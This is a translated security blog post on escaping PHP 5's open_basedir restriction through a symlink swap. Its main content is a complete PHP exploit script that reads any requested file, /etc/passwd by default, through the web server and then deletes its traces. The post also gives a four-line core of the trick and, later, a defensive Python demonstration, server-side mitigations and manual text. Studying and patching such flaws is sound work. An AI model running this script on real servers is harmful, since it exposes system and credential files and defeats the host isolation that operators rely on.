PHP5 full-version bypass open_basedir File Read Script Vulnerability details

Source: Internet
Author: User
Tags: symlink
This article describes a script that reads files past open_basedir on every PHP 5 version. The issue was reported a long time ago (about five years ago) and still exists in the latest version; readers who need it can refer to the details below.

The vulnerability was reported a long time ago (about five years ago), but because it is not regarded as a bug in PHP's own code, the problem has persisted to this day. I had never paid attention to it; yaseng told me that it could also be tested successfully on 5.5.

Here are the vulnerability details.

Below is the exp I wrote:

The Code is as follows:


<?php
/*
 * by phithon
 * From
 * Detail:
 */
header('content-type: text/plain');
error_reporting(-1);
ini_set('display_errors', TRUE);
printf("open_basedir: %s\nphp_version: %s\n", ini_get('open_basedir'), phpversion());
printf("disable_functions: %s\n", ini_get('disable_functions'));

// target file to read; defaults to /etc/passwd
$file = str_replace('\\', '/', isset($_REQUEST['file']) ? $_REQUEST['file'] : '/etc/passwd');
$relat_file = getRelativePath(__FILE__, $file);
$paths = explode('/', $file);
$name = mt_rand() % 999;
$exp = getRandStr();

// rebuild the target's directory structure under a scratch directory,
// so that the link target exists inside open_basedir when it is checked
mkdir($name);
chdir($name);
for ($i = 1; $i < count($paths) - 1; $i++) {
    mkdir($paths[$i]);
    chdir($paths[$i]);
}
mkdir($paths[$i]);
for ($i -= 1; $i > 0; $i--) {
    chdir('..');
}

// one nested scratch directory per '..' in the relative path to the target
$paths = explode('/', $relat_file);
$j = 0;
for ($i = 0; $paths[$i] == '..'; $i++) {
    mkdir($name);
    chdir($name);
    $j++;
}
for ($i = 0; $i <= $j; $i++) {
    chdir('..');
}

// tmplink -> name/name/.../name ; exp -> tmplink/../../..(j times)/<file>
$tmp = array_fill(0, $j + 1, $name);
symlink(implode('/', $tmp), 'tmplink');
$tmp = array_fill(0, $j, '..');
symlink('tmplink/' . implode('/', $tmp) . $file, $exp);

// swap the symlink for a real directory: exp now resolves outside the tree
unlink('tmplink');
mkdir('tmplink');
delfile($name);

// fetch the link through the web server rather than through PHP's file API
$exp = dirname($_SERVER['SCRIPT_NAME']) . "/{$exp}";
$exp = "http://{$_SERVER['SERVER_NAME']}{$exp}";
echo "\n-----------------content---------------\n";
echo file_get_contents($exp);
delfile('tmplink');

function getRelativePath($from, $to)
{
    // some compatibility fixes for Windows paths
    $from = rtrim($from, '\/') . '/';
    $from = str_replace('\\', '/', $from);
    $to   = str_replace('\\', '/', $to);

    $from    = explode('/', $from);
    $to      = explode('/', $to);
    $relPath = $to;

    foreach ($from as $depth => $dir) {
        // find first non-matching dir
        if ($dir == $to[$depth]) {
            // ignore this directory
            array_shift($relPath);
        } else {
            // get number of remaining dirs to $from
            $remaining = count($from) - $depth;
            if ($remaining > 1) {
                // add traversals up to first matching dir
                $padLength = (count($relPath) + $remaining - 1) * -1;
                $relPath = array_pad($relPath, $padLength, '..');
                break;
            } else {
                $relPath[0] = './' . $relPath[0];
            }
        }
    }
    return implode('/', $relPath);
}

// recursively delete a file or directory tree
function delfile($deldir)
{
    if (@is_file($deldir)) {
        @chmod($deldir, 0777);
        return @unlink($deldir);
    } else if (@is_dir($deldir)) {
        if (($mydir = @opendir($deldir)) == NULL) return false;
        while (false !== ($file = @readdir($mydir))) {
            $name = File_Str($deldir . '/' . $file);
            if (($file != '.') && ($file != '..')) { delfile($name); }
        }
        @closedir($mydir);
        @chmod($deldir, 0777);
        return @rmdir($deldir) ? true : false;
    }
}

// normalise path separators
function File_Str($string)
{
    return str_replace('//', '/', str_replace('\\', '/', $string));
}

// random name for the exploit link, so repeated runs do not collide
function getRandStr($length = 6)
{
    $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $randStr = '';
    for ($i = 0; $i < $length; $i++) {
        $randStr .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);
    }
    return $randStr;
}

For example, suppose we want to read /etc/passwd. The principle is to create a link file x that points to a/a by a relative path, and then create a link file exp that points to x/../../etc/passwd.

exp therefore resolves to a/a/../../etc/passwd, which is simply ./etc/passwd, a location inside the allowed directory.

Now delete x and create a directory named x in its place. exp still points to x/../../etc/passwd, but with x a real directory the path resolves to /etc/passwd, so the link has crossed out of the open_basedir tree.

The essence is the following four lines:

The Code is as follows:


symlink("abc/abc", "tmplink");
symlink("tmplink/../../etc/passwd", "exploit");
unlink("tmplink");
mkdir("tmplink");

If the web server is allowed to follow linked files, fetching exploit through it returns /etc/passwd.

None of these operations triggers an open_basedir error, yet the net result is that open_basedir is bypassed and an arbitrary file is read.
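To make the mechanism concrete from the defender's side, the following Python script (an added example, not code from the original article) rebuilds the four-line link swap inside a throwaway directory and shows why a check that looks at the link target only when symlink() is called passes, while the same check repeated on the fully resolved path at open time fails. The directory names www, abc/abc and secret/target.txt and the file content are constructed for the demonstration; the helper names within_basedir and guarded_read are this example's own.

```python
import os
import tempfile


def within_basedir(path: str, basedir: str) -> bool:
    """Resolve every symlink in `path` (as open_basedir does when a file is
    opened) and report whether the result is still inside `basedir`."""
    real = os.path.realpath(path)
    base = os.path.realpath(basedir)
    return real == base or real.startswith(base + os.sep)


def guarded_read(path: str, basedir: str) -> str:
    """Read `path` only if its fully resolved location lies under `basedir`.
    The decision is made at open time on the resolved path, not on the text
    of a link target, which is the property the link swap defeats."""
    if not within_basedir(path, basedir):
        raise PermissionError(f"{path} resolves outside {basedir}")
    with open(path, encoding="utf-8") as fh:
        return fh.read()


def run_demo() -> dict:
    """Rebuild the article's four-line link swap in a temporary directory.
    root/www stands in for the web root (the open_basedir tree) and
    root/secret/target.txt for a file outside it; both are constructed."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.realpath(tmp)  # the temp dir itself may be a symlink
        www = os.path.join(root, "www")
        os.makedirs(os.path.join(www, "abc", "abc"))
        os.makedirs(os.path.join(root, "secret"))
        with open(os.path.join(root, "secret", "target.txt"), "w", encoding="utf-8") as fh:
            fh.write("constructed sample content\n")

        old_cwd = os.getcwd()
        os.chdir(www)
        try:
            # 1. tmplink -> abc/abc (relative path, two levels down)
            os.symlink("abc/abc", "tmplink")
            # 2. exploit -> tmplink/../../secret/target.txt
            #    right now that resolves to www/secret/target.txt: inside www
            os.symlink("tmplink/../../secret/target.txt", "exploit")
            before = os.path.realpath("exploit")
            inside_before = within_basedir("exploit", www)
            # 3./4. replace the symlink with a real directory of the same name
            os.unlink("tmplink")
            os.mkdir("tmplink")
            after = os.path.realpath("exploit")
            inside_after = within_basedir("exploit", www)
            # a reader that follows the link blindly gets the out-of-tree content
            with open("exploit", encoding="utf-8") as fh:
                naive = fh.read()
            # a reader that re-checks the resolved path at open time refuses
            try:
                guarded = guarded_read("exploit", www)
            except PermissionError:
                guarded = "refused"
        finally:
            os.chdir(old_cwd)

    return {
        "before": os.path.relpath(before, root),
        "after": os.path.relpath(after, root),
        "inside_before": inside_before,
        "inside_after": inside_after,
        "naive_read_after": naive,
        "guarded_read_after": guarded,
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value!r}")
```

Run it with python3 on a Unix-like host: the printed dictionary shows exploit resolving to www/secret/target.txt before the swap and to secret/target.txt after it. PHP checked the link target against open_basedir only when symlink() was called, at which point it still resolved inside the tree; the later change beneath tmplink is invisible to it, and a web server that follows symbolic links serves the file with no PHP check at all. The practical mitigations are therefore on the server side: add symlink to disable_functions, and do not let the web server follow links created by the PHP user (for Apache, Options -FollowSymLinks, or SymLinksIfOwnerMatch so that a link owned by the web user to a root-owned file is not followed).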

The flaw is not in PHP itself, but I do not know whose flaw it is, so PHP has never dealt with this problem.

open_basedir

Restricts the files that PHP can open to the specified directory tree, including the file itself. This directive is not affected by whether safe mode is enabled or disabled.

When a script tries to open a file with fopen() or gzopen(), the file's location is checked. PHP refuses to open a file outside the specified directory tree. All symbolic links are resolved, so it is not possible to escape this restriction by means of a symbolic link.

The special value . means that the script's working directory is used as the base directory. This is dangerous, because the script's working directory can easily be changed with chdir().

In httpd.conf, open_basedir can be turned off with php_admin_value open_basedir none, just like any other configuration option (for example, in some virtual hosts).

On Windows, separate directories with semicolons; on every other system, separate them with colons. As an Apache module, open_basedir paths set in parent directories are inherited automatically.
